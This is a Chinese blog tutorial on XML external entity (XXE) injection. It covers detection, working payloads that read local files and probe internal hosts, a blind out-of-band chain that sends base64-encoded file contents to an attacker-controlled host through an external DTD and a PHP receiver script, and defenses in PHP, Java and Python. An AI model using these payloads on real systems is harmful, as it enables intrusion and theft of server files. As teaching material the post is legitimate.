XXE XML漏洞

最新推荐文章于 2024-07-22 14:16:57 发布
最新推荐文章于 2024-07-22 14:16:57 发布
阅读量109 收藏
点赞数
文章标签: xml
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55894976/article/details/129903549
版权

XML的定义

XML被设计为传输和存储数据格式类型,目的是把数据从HTML中分离
xml有一个自己的格式规范,如下:
<?xml version="1.0" >//xml文档定义
<!DOCTYPE massage [
<!ELEMENT message (receiver,sender,header,msg)>
<!ELEMENT receiver(#PCDATA)
​
以上就是xml的格式规范,这个格式规范是由一个叫做DTD的东西控制的
​
实体:ENTITY是实体的声明,实体可以理解为变量
​
外部资源的申请:SYSTEM PUBLIC是外部资源的申请
​
DTD的声明:DOCTYPE是DTD的声明,以代码定义了XML的根元素是message,那么XML必须如下写:
<message>
<receiver>myself</receiver>
</message>
​
# 外部实体
外部实体用于加载外部文件的内容。(显示XXE攻击主要利用普通实体)
​
# 内部实体
​
​

XXE

XXE全称XML外部实体注入漏洞,发生在应用程序解析XML输入时,**没有禁止外部实体的加载**,导致可加载恶意外部文件,造成文件读取,命令执行,内网端口扫描,攻击内网网站等危害

xxe检测是否有漏洞

  • 有明显xml数据传输

在抓包的时候,发现有xml数据的传输,那么可以在xml数据传输的地方插入攻击的xml的payload

  • 根据content-type值判断

# content-type值为text/xml或者application/xml可能存在xml漏洞
​
# 盲猜
更改content-type的值为xml型的,然后再传输xml攻击payload查看是否有xxe漏洞

  • 提交一个简单的xml测试语句,查看打印结果

# post提交数据
​
<?xml version = "1.0"?>
<!DOCTYPE ANY [
<!ENTITY test "fuck xxe"> ]>
<t>&test</t>

xxe具体攻击方法

有回显

  • 读文档文件

​
    <?xml version = "1.0"?>
    <!DOCTYPE ANY [
    <!ENTITY xxe SYSTEM "file:///C:/Windows/win.ini">
    ]>
    <x>&xxe;</x>
​

  • 读取php文件

<?xml version="1.0" encoding="utf-8"?>
​
<!DOCTPE  ANY[
​
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=conf.php">]>
​
<name>&xxe;</name>
​

  • 内网探测(存活主机)[无法探测到未开80端口的主机]

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY rabbit SYSTEM "http://192.168.96.152">
]>
<x>&rabbit;</x> 
​
当无回显或者回显为invalid element name时说明这个主机存在
​
当回显为failed to open stream时说明主机不存在

  • 引入外部实体

引入外部的dtd文件,可以是本地文件,也可以是来自其他主机的dtd文件


    <?xml version="1.0" ?>
    <!DOCTYPE ANY [
    <!ENTITY % file SYSTEM "http://192.168.96.1/xxe.dtd">
    %file;
    ]>
    <x>&xxe;</x>
    
# xxe.dtd
<!ENTITY xxe SYSTEM "file:///etc/passwd">

无回显

  • 步骤

(1)读取文件/etc/passwd内容,经过base64编码赋给file

(2)通过引入外部实体blind.dtd,访问http://攻击主机IP/xxe_send.php

(3)通过xxe_send.php将file的值写入到xxe.txt,从而使攻击主机得到base64编码的数据

(通过第三方来获取file,因为file在被攻击的主机上不会被显示,所以通过第三方来获得file的内容)

<?xml version="1.0" ?>
<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=C:/Windows/win.ini">
<!ENTITY % dtd SYSTEM "http://192.168.96.1/blind.dtd">
%send;
]>

# blind.dtd
<!ENTITY % blind
"<!ENTITY % send SYSTEM 'http://192.168.96.1/xxe_send.php?data=%file;'>"
>
%blind;

# xxe_send.php:
<?php
    $data = $_GET["data"];
    file_put_contents("xxe.txt",$data);
?>

防御方法

  • 禁用外部实体

PHP:
libxml_disable_entity_loader(true);


JAVA:
DocumentBuilderFactory
dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);


Python:
from lxml import etreexmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))

  • 过滤用户提交的xml数据

 过滤关键词: <!DOCTYPE 和 <!ENTITY ,或者 SYSTEM 和 PUBLIC

じ 耐人
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
XXE漏洞以及XXE漏洞如何修复
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
09-09 2万+
XXE漏洞是什么?XXEXML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击。由于程序在解析输入的XML数据时,解析了攻击者伪造的外部实体而产生的。这些就称为XXE漏洞。知道XXE漏洞前首先得先了解XMLXXE漏洞如何修复的方案一:使用开发语言提供的禁用外部实体的方法1.PHP开发语言禁用外部实体的方法:libxml_disable_entity_loader(true);XXE漏洞如何修复的方案二:尽量不要让用户直接
初识XML------XXE漏洞
weixin_44770698的博客
06-09 444
初始XXE漏洞
网络安全实战从 0 到 1 彻底掌握 XXE
zxcvbnmasdflzl的博客
03-27 1310
网络安全实战从 0 到 1 彻底掌握 XXE
XXE&XML漏洞详解
剁椒鱼头没剁椒的博客
12-29 4004
这里我对XML也不是太懂,无法对其进行解释,同时也怕解释出现错误,使其误导,这里我发一下参考链接。XML教程文档类型定义(DTD)可定义合法的XML文档构建模块,它使用一系列合法的元素来定义文档的结构。DTD 可被成行地声明于XML文档中(内部引用),也可作为一个外部引用。内部声明DTD: 引用外部DTD: DTD文档中有很多重要的关键字如下:DOCTYPE(DTD的声明)
XXE-XML实体注入漏洞
2301_80661529的博客
03-07 1268
DTD(document type definition)文档类型定义用于定义XML文档的结构,它作为xml文件的 一部分位于XML声明和文档元素之间,比如下面DTD它就定义了 XML 的根元素必须是message,根元素下面有一些子元素,所以 XML必须像下 面这么写:其中,DTD需要在!DOCTYPE注释中定义根元素,而后在中括号的[]内使用!ELEMENT注 释定义各元素特征。
xmlxxe漏洞
m0_48907714的博客
04-25 4204
XXE漏洞 XML概念 XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XMLExternal Entity Injection,即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。 XML与HTML的主要差异 XML被设计为传输和存储数据,其焦
XML简介和XXE漏洞
weixin_43876438的博客
10-22 434
文章目录XML简介和XXE漏洞XML简介使用XML结构XML语法说明XML元素XML属性XML验证XML命名空间CDATADTD内部DTD外部DTDDTD实体内部实体外部实体XXE漏洞危害防护攻击方式实战例子 XML简介和XXE漏洞 XML简介 XML指可扩展标记语言,它被设计用来传输和存储数据。(HTML被用来显示数据) XML没有预定义的标签,需要自行定义标签 XML是不作为的,及它不存在任何的行为,只是用来结构化、传输和存储信息 它仅仅是纯文字 XML 是独立于软件和硬件的信息传输工具。 (更多介绍
XXE&XML 漏洞
weixin_53150482的博客
07-18 166
XXE&XML 漏洞
XXE注入漏洞总结
m0_66458291的博客
12-25 486
XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令执行、内网端口扫描、攻击内网网站等危害。XML数据传输数据包分析xml是文件传输的一种格式,就像字符串一样,xml对应的数据格式
SCAN_XXE:利用XML XXE漏洞
05-07
XML External Entity(XXEXML外部实体)漏洞是一种常见的安全问题,主要出现在处理XML输入的Web应用程序中。这种漏洞允许攻击者通过恶意构造的XML文档,来读取服务器的内部文件、执行系统命令或者进行DoS(拒绝...
5、XXE漏洞pdf资料
10-15
XXEXML External Entity)漏洞是针对XML解析器的安全漏洞,它发生在XML解析器处理包含外部实体引用的恶意XML输入时。XML(eXtensible Markup Language)是一种用于存储和传输数据的标记语言,它的主要特点是允许...
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
XXEXML External Entity)是一种常见的 Web 应用程序漏洞,攻击者可以通过构造恶意的 XML 文档, trick 服务器将任意文件读取出来,导致敏感信息泄露。在本节中,我们将详细介绍 XXE 漏洞的利用方法,特别是任意...
WebGoat8-xxe注入漏洞分析
09-15
在 Web 应用程序安全测试中,XXEXML External Entity)注入漏洞是一种常见的漏洞,攻击者可以通过该漏洞读取服务器上的敏感信息甚至控制服务器。下面是对 WebGoat8 中的 XXE 注入漏洞的分析。 XXE 注入漏洞的工作...
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
XXEXML External Entity)漏洞,全称为XML外部实体注入,是针对使用XML解析器的应用程序的一种安全漏洞XML是一种标记语言,常用于数据交换,而外部实体是XML文档的一部分,允许引用外部资源,如文件系统、网络...
XMl基本操作
weixin_73775528的博客
07-20 631
使⽤Mybatis的注解⽅式,主要是来完成⼀些简单的增删改查功能. 如果需要实现复杂的SQL功能,建议使⽤XML来配置映射语句,也就是将SQL语句写在XML配置⽂件中.之前,我们学习了,用注解的方式来实现MyBatis接下来我们学习XML的⽅式MyBatis XML的⽅式需要以下两步配置数据库连接字符串和MyBatis写持久层代码MyBatis XML配置⽂件配置连接字符串和MyBatis此步骤需要进⾏两项设置,数据库连接字符串设置和 MyBatis 的 XML ⽂件配置。写持久层代码。
Java推送xml数据进行http请求
最新发布
柳落青
07-22 132
【代码】Java推送xml数据进行http请求。
漏洞复现】泛微E-Cology WorkflowServiceXml SQL注入漏洞
失心少年
07-22 154
泛微E-Cology 是一款协同管理平台,旨在为中大型组织创建全新的高效协同办公环境。包含流程、门户、知识、人事、沟通、客户、项目、财务等 20多个功能模块。该系统WorkflowServiceXml接口处未对用户输入进行有效过滤,直接将其拼接进了SQL语句中,导致SQL注入漏洞,会导致数据泄露。技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。
C/C++ xml
mayue_web的博客
07-18 1029
XML(eXtensible Markup Language,可扩展标记语言)是一种标记语言,主要用于存储和传输数据。它定义了数据的结构和语义,但不定义数据的呈现方式。XML 是一种自描述的语言,易于理解和使用。可扩展性:用户可以定义自己的标签,使其适应不同的需求。自描述性:标签本身描述了数据的内容和结构。简洁性:与HTML相比,XML标签更简洁,减少了冗余。可读性:标签清晰,易于人类阅读和理解。跨平台:可以在任何操作系统上使用,与平台无关。数据交换:广泛用于不同系统之间的数据交换。
"XXE漏洞分析与防御:深度剖析XML实体注入漏洞及防范措施
在本文中,我们将重点讨论XXEXML External Entity)漏洞,并从XML的基础知识,XXE攻击方式,利用方法以及防御措施等方面展开讨论。 首先,我们先来了解一下XML的基础知识。XML(Extensible Markup Language)是一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值